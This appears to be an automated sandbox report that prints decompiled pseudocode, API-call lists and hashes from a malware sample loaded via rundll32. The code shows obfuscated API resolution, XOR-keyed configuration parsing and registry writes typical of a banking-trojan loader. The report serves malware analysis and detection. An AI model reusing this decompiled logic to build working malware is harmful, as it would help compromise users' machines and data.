                                            • Part of subcall function 067757D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 0677581F
                                            • Part of subcall function 067757D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 06775835
                                            • Part of subcall function 067757D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0677584B
                                            • Part of subcall function 067757D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 06775861
                                            • Part of subcall function 067757D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 06775877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 067714C5
                                          • memset.NTDLL ref: 06771500
                                            • Part of subcall function 067777E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,0677333A,73797325), ref: 067777F7
                                            • Part of subcall function 067777E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 06777811
                                          • GetModuleHandleA.KERNEL32(4E52454B,06C48CEF,73797325), ref: 06771536
                                          • GetProcAddress.KERNEL32(00000000), ref: 0677153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 067715A5
                                            • Part of subcall function 0677684E: GetProcAddress.KERNEL32(36776F57,0677935F), ref: 06776869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 06771582
                                          • CloseHandle.KERNEL32(?), ref: 06771587
                                          • GetLastError.KERNEL32(00000001), ref: 0677158B
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: e9677c948723f390082bc2b8b6bf667da043dd43d5c7f000fdd6b0d22fb832a9
                                          • Instruction ID: dd83a5366b9aee6ddcaf417bf3e23f96611c81daee98153b3dc0cd04ed3e463e
                                          • Opcode Fuzzy Hash: e9677c948723f390082bc2b8b6bf667da043dd43d5c7f000fdd6b0d22fb832a9
                                          • Instruction Fuzzy Hash: C03139B2D00209AFDF61AFA4DC88DAEBBBDEF08244F544565E606E7110D6359A44DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06774D2C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E06774D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x677d2a4; // 0x4ca5a8
				_t1 = _t9 + 0x677e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E06776027(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E067758BE(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E06776F33(_t34, _t41, _a8);
						E0677147E(_t41);
						_t42 = E06774759(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E0677147E(_t36);
							_t36 = _t42;
						}
						_t43 = E06774858(_t36, _t33);
						if(_t43 != 0) {
							E0677147E(_t36);
							_t36 = _t43;
						}
					}
					E0677147E(_t28);
				}
				return _t36;
			}














                                          0x06774d2c
                                          0x06774d2f
                                          0x06774d30
                                          0x06774d38
                                          0x06774d3f
                                          0x06774d46
                                          0x06774d4a
                                          0x06774d50
                                          0x06774d57
                                          0x06774d5c
                                          0x06774d6e
                                          0x06774d72
                                          0x06774d76
                                          0x06774d7c
                                          0x06774d81
                                          0x06774d91
                                          0x06774d93
                                          0x06774daa
                                          0x06774dae
                                          0x06774db1
                                          0x06774db6
                                          0x06774db6
                                          0x06774dbf
                                          0x06774dc3
                                          0x06774dc6
                                          0x06774dcb
                                          0x06774dcb
                                          0x06774dc3
                                          0x06774dce
                                          0x06774dce
                                          0x06774dd9

                                          APIs
                                            • Part of subcall function 06776027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,06774D46,253D7325,00000000,00000000,74ECC740,?,?,067752FE,?), ref: 0677608E
                                            • Part of subcall function 06776027: sprintf.NTDLL ref: 067760AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,067752FE,?,06C495B0), ref: 06774D57
                                          • lstrlen.KERNEL32(?,?,?,067752FE,?,06C495B0), ref: 06774D5F
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • strcpy.NTDLL ref: 06774D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 06774D81
                                            • Part of subcall function 06776F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,06774D90,00000000,?,?,?,067752FE,?,06C495B0), ref: 06776F4A
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,067752FE,?,06C495B0), ref: 06774D9E
                                            • Part of subcall function 06774759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,06774DAA,00000000,?,?,067752FE,?,06C495B0), ref: 06774763
                                            • Part of subcall function 06774759: _snprintf.NTDLL ref: 067747C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: 35c50b40b8c9d004a14893240197b6b56aa408bda7f345456b3caee5735341fe
                                          • Instruction ID: 085d78644519c7aeca0144f05b1098588fb26405f0b26f36ad73247559cfd918
                                          • Opcode Fuzzy Hash: 35c50b40b8c9d004a14893240197b6b56aa408bda7f345456b3caee5735341fe
                                          • Instruction Fuzzy Hash: C711C673A012257B8FA2BBF49C48C6F3AAD9F495643154115F724FB108DE34DD0197E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 067798F7, Relevance: 9.2, APIs: 6, Instructions: 187memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E067798F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				signed int _t18;
				signed int _t23;
				void* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t41;
				void* _t43;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t54;
				signed int _t58;
				signed int _t62;
				signed int _t66;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t80 = __edi;
				_t72 = __ecx;
				_t69 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0x677d2a0; // 0x59935a40
				if(E067796D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
					 *0x677d2d0 = _v12;
				}
				_t23 =  *0x677d2a0; // 0x59935a40
				if(E067796D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
					_t28 = 2;
					return _t28;
				} else {
					_push(_t69);
					_t70 = _v12;
					_push(_t83);
					_push(_t80);
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t66 =  *0x677d2a0; // 0x59935a40
						_t29 = E067710CA(_t72, _t70, _t66 ^ 0x48b4463f);
					}
					if(_t29 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0x677d240 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t62 =  *0x677d2a0; // 0x59935a40
						_t30 = E067710CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
					}
					if(_t30 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0x677d244 = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t58 =  *0x677d2a0; // 0x59935a40
						_t31 = E067710CA(_t72, _t70, _t58 ^ 0x01dd0365);
					}
					if(_t31 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x677d248 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t54 =  *0x677d2a0; // 0x59935a40
						_t32 = E067710CA(_t72, _t70, _t54 ^ 0x3cf823ca);
					}
					if(_t32 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x677d004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t50 =  *0x677d2a0; // 0x59935a40
						_t33 = E067710CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
					}
					if(_t33 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x677d02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t46 =  *0x677d2a0; // 0x59935a40
						_t34 = E067710CA(_t72, _t70, _t46 ^ 0x163b337e);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t43 = 0x10;
						_t44 = E0677A2EF(_t43);
						if(_t44 != 0) {
							_push(_t44);
							E06779B10();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t41 =  *0x677d2a0; // 0x59935a40
						_t35 = E067710CA(_t72, _t70, _t41 ^ 0x89f501b6);
					}
					if(_t35 != 0 && E0677A2EF(0, _t35) != 0) {
						_t86 =  *0x677d324; // 0x6c495b0
						E06774C3A(_t86 + 4, _t39);
					}
					HeapFree( *0x677d238, 0, _t70);
					return 0;
				}
			}





























                                          0x067798f7
                                          0x067798f7
                                          0x067798f7
                                          0x067798f7
                                          0x067798fa
                                          0x067798fb
                                          0x067798fc
                                          0x06779916
                                          0x06779924
                                          0x06779924
                                          0x06779929
                                          0x06779943
                                          0x06779ad2
                                          0x06779ad4
                                          0x06779949
                                          0x06779949
                                          0x0677994a
                                          0x0677994d
                                          0x0677994e
                                          0x06779953
                                          0x06779969
                                          0x06779955
                                          0x06779955
                                          0x06779962
                                          0x06779962
                                          0x06779973
                                          0x06779975
                                          0x0677997f
                                          0x06779984
                                          0x06779984
                                          0x0677997f
                                          0x0677998b
                                          0x067799a1
                                          0x0677998d
                                          0x0677998d
                                          0x0677999a
                                          0x0677999a
                                          0x067799a5
                                          0x067799a7
                                          0x067799b1
                                          0x067799b6
                                          0x067799b6
                                          0x067799b1
                                          0x067799bd
                                          0x067799d3
                                          0x067799bf
                                          0x067799bf
                                          0x067799cc
                                          0x067799cc
                                          0x067799d7
                                          0x067799d9
                                          0x067799e3
                                          0x067799e8
                                          0x067799e8
                                          0x067799e3
                                          0x067799ef
                                          0x06779a05
                                          0x067799f1
                                          0x067799f1
                                          0x067799fe
                                          0x067799fe
                                          0x06779a09
                                          0x06779a0b
                                          0x06779a15
                                          0x06779a1a
                                          0x06779a1a
                                          0x06779a15
                                          0x06779a21
                                          0x06779a37
                                          0x06779a23
                                          0x06779a23
                                          0x06779a30
                                          0x06779a30
                                          0x06779a3b
                                          0x06779a3d
                                          0x06779a47
                                          0x06779a4c
                                          0x06779a4c
                                          0x06779a47
                                          0x06779a53
                                          0x06779a69
                                          0x06779a55
                                          0x06779a55
                                          0x06779a62
                                          0x06779a62
                                          0x06779a6d
                                          0x06779a6f
                                          0x06779a72
                                          0x06779a73
                                          0x06779a7a
                                          0x06779a7c
                                          0x06779a7d
                                          0x06779a7d
                                          0x06779a7a
                                          0x06779a84
                                          0x06779a9a
                                          0x06779a86
                                          0x06779a86
                                          0x06779a93
                                          0x06779a93
                                          0x06779a9e
                                          0x06779aac
                                          0x06779ab6
                                          0x06779ab6
                                          0x06779ac3
                                          0x06779acf
                                          0x06779acf

                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0677D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,06774A8B), ref: 0677997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0677D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,06774A8B), ref: 067799AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0677D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,06774A8B), ref: 067799DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0677D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,06774A8B), ref: 06779A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0677D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,06774A8B), ref: 06779A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,0677D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,06774A8B), ref: 06779AC3
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: a5e7ab7d9c1316c483f192299a77ae66b02e183d0d26b0d8d9114a69ebe014e3
                                          • Instruction ID: fccd9f4a52c3417fe9ab940403a4b72968d9d01a19ead6e3226831708b06383f
                                          • Opcode Fuzzy Hash: a5e7ab7d9c1316c483f192299a77ae66b02e183d0d26b0d8d9114a69ebe014e3
                                          • Instruction Fuzzy Hash: C9517571F12204EEDFA0EBB9DD88D6F76EEEFC86007654925A701D7108EA71D941CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0677135B, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 067713B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 067713C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 067713DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 06771443
                                          • SysFreeString.OLEAUT32(00000000), ref: 06771452
                                          • SysFreeString.OLEAUT32(00000000), ref: 0677145D
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: bdf1e80c50a5bcb8dea7638deb8c414cbc15bfcd27fadf158e8fb997b33d7a95
                                          • Instruction ID: 8108ddcb7063dfec48dd9726e3c8c8f06cefc7615d8e59fb59de8d5c41c5d93a
                                          • Opcode Fuzzy Hash: bdf1e80c50a5bcb8dea7638deb8c414cbc15bfcd27fadf158e8fb997b33d7a95
                                          • Instruction Fuzzy Hash: 91416F36D00609AFDF42EFFCD844AAEB7BAEF49205F548425EE14EB110DA71D906CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 067757D8, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E067757D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E067758BE(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x677d2a4; // 0x4ca5a8
					_t1 = _t23 + 0x677e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x677d2a4; // 0x4ca5a8
					_t2 = _t26 + 0x677e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E0677147E(_t54);
					} else {
						_t30 =  *0x677d2a4; // 0x4ca5a8
						_t5 = _t30 + 0x677e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x677d2a4; // 0x4ca5a8
							_t7 = _t33 + 0x677e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x677d2a4; // 0x4ca5a8
								_t9 = _t36 + 0x677e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x677d2a4; // 0x4ca5a8
									_t11 = _t39 + 0x677e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E06777B01(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                          0x067757e7
                                          0x067757eb
                                          0x067758ad
                                          0x067757f1
                                          0x067757f1
                                          0x067757f6
                                          0x06775809
                                          0x0677580b
                                          0x06775810
                                          0x06775818
                                          0x0677581f
                                          0x06775821
                                          0x06775826
                                          0x067758a5
                                          0x067758a6
                                          0x06775828
                                          0x06775828
                                          0x0677582d
                                          0x06775835
                                          0x06775837
                                          0x0677583c
                                          0x00000000
                                          0x0677583e
                                          0x0677583e
                                          0x06775843
                                          0x0677584b
                                          0x0677584d
                                          0x06775852
                                          0x00000000
                                          0x06775854
                                          0x06775854
                                          0x06775859
                                          0x06775861
                                          0x06775863
                                          0x06775868
                                          0x00000000
                                          0x0677586a
                                          0x0677586a
                                          0x0677586f
                                          0x06775877
                                          0x06775879
                                          0x0677587e
                                          0x00000000
                                          0x06775880
                                          0x06775886
                                          0x0677588b
                                          0x06775892
                                          0x06775897
                                          0x0677589c
                                          0x00000000
                                          0x0677589e
                                          0x067758a1
                                          0x067758a1
                                          0x0677589c
                                          0x0677587e
                                          0x06775868
                                          0x06775852
                                          0x0677583c
                                          0x06775826
                                          0x067758bb

                                          APIs
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,067714AF,?,?,?,?,00000000,00000000), ref: 067757FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 0677581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 06775835
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0677584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 06775861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 06775877
                                            • Part of subcall function 06777B01: memset.NTDLL ref: 06777B80
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: 494718cb08cda428d91ddfd7972198d75880d344a4e2a0823207663b1099ac64
                                          • Instruction ID: 62a3148e6e8ccc88c2d59ba10bcdb50167a5a16ca63435e96bf1b7888c0de3ca
                                          • Opcode Fuzzy Hash: 494718cb08cda428d91ddfd7972198d75880d344a4e2a0823207663b1099ac64
                                          • Instruction Fuzzy Hash: 032181B0A1070BEFEB60DF69CC44D6AB7EDEF442147048565EA08DB211EB74E905CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0677A642, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0677A642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0x677d33c);
					_t96 = 0x80000002;
					L6:
					_t60 = E0677A5E9(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E0677621D(_t97, _t105, _t96, _t60) != 0) {
						L27:
						E0677147E(_a8);
						goto L29;
					}
					_t65 =  *0x677d2a4; // 0x4ca5a8
					_t16 = _t65 + 0x677e8de; // 0x65696c43
					_t68 = E0677A5E9(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d0677c0
						if(E06774C9A( *_t33, _t96, _a8,  *0x677d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x677d2a4; // 0x4ca5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0x677ea54; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x677ea4f; // 0x55434b48
								_t73 = _t34;
							}
							if(E067730FC( &_a24, _t73,  *0x677d334,  *0x677d338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0x677d2a4; // 0x4ca5a8
									_t44 = _t75 + 0x677e856; // 0x74666f53
									_t78 = E0677A5E9(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d0677c0
										E06771BC1( *_t47, _t96, _a8,  *0x677d338, _a24);
										_t49 = _t105 + 0x10; // 0x3d0677c0
										E06771BC1( *_t49, _t96, _t103,  *0x677d330, _a16);
										E0677147E(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d0677c0
									E06771BC1( *_t40, _t96, _a8,  *0x677d338, _a24);
									_t43 = _t105 + 0x10; // 0x3d0677c0
									E06771BC1( *_t43, _t96, _a8,  *0x677d330, _a16);
								}
								if( *_t105 != 0) {
									E0677147E(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d0677c0
					if(E067774B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d0677c0
							E06774C9A( *_t26, _t96, _a8, _a24, _t104);
						}
						E0677147E(_t104);
						_t102 = _a16;
					}
					E0677147E(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0x677d33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}























                                          0x0677a642
                                          0x0677a64b
                                          0x0677a652
                                          0x0677a657
                                          0x0677a6c6
                                          0x0677a6cc
                                          0x0677a6d1
                                          0x0677a6da
                                          0x0677a6df
                                          0x0677a6e4
                                          0x0677a858
                                          0x0677a85f
                                          0x0677a85f
                                          0x0677a864
                                          0x0677a866
                                          0x0677a866
                                          0x0677a86f
                                          0x0677a86f
                                          0x0677a6ea
                                          0x0677a6f6
                                          0x0677a84e
                                          0x0677a851
                                          0x00000000
                                          0x0677a851
                                          0x0677a6fc
                                          0x0677a701
                                          0x0677a70a
                                          0x0677a70f
                                          0x0677a714
                                          0x0677a75e
                                          0x0677a75e
                                          0x0677a771
                                          0x0677a77b
                                          0x0677a781
                                          0x0677a788
                                          0x0677a792
                                          0x0677a792
                                          0x0677a78a
                                          0x0677a78a
                                          0x0677a78a
                                          0x0677a78a
                                          0x0677a7b4
                                          0x0677a7bc
                                          0x0677a7ea
                                          0x0677a7ef
                                          0x0677a7f8
                                          0x0677a7fd
                                          0x0677a801
                                          0x0677a833
                                          0x0677a803
                                          0x0677a810
                                          0x0677a813
                                          0x0677a823
                                          0x0677a826
                                          0x0677a82c
                                          0x0677a82c
                                          0x0677a7be
                                          0x0677a7cb
                                          0x0677a7ce
                                          0x0677a7e0
                                          0x0677a7e3
                                          0x0677a7e3
                                          0x0677a83d
                                          0x0677a849
                                          0x0677a83f
                                          0x0677a842
                                          0x0677a842
                                          0x0677a83d
                                          0x0677a7b4
                                          0x00000000
                                          0x0677a77b
                                          0x0677a723
                                          0x0677a72d
                                          0x0677a72f
                                          0x0677a734
                                          0x0677a738
                                          0x0677a73a
                                          0x0677a745
                                          0x0677a748
                                          0x0677a748
                                          0x0677a74e
                                          0x0677a753
                                          0x0677a753
                                          0x0677a759
                                          0x00000000
                                          0x0677a759
                                          0x0677a65c
                                          0x00000000
                                          0x0677a683
                                          0x0677a68e
                                          0x0677a6a4
                                          0x0677a6aa
                                          0x0677a6b2
                                          0x00000000
                                          0x0677a6b2

                                          APIs
                                          • StrChrA.SHLWAPI(0677553C,0000005F,00000000,00000000,00000104), ref: 0677A675
                                          • memcpy.NTDLL(?,0677553C,?), ref: 0677A68E
                                          • lstrcpy.KERNEL32(?), ref: 0677A6A4
                                            • Part of subcall function 0677A5E9: lstrlen.KERNEL32(?,00000000,0677D330,00000001,0677937A,0677D00C,0677D00C,00000000,00000005,00000000,00000000,?,?,?,0677207E,?), ref: 0677A5F2
                                            • Part of subcall function 0677A5E9: mbstowcs.NTDLL ref: 0677A619
                                            • Part of subcall function 0677A5E9: memset.NTDLL ref: 0677A62B
                                            • Part of subcall function 06771BC1: lstrlenW.KERNEL32(0677553C,?,?,0677A818,3D0677C0,80000002,0677553C,06779642,74666F53,4D4C4B48,06779642,?,3D0677C0,80000002,0677553C,?), ref: 06771BE1
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0677A6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
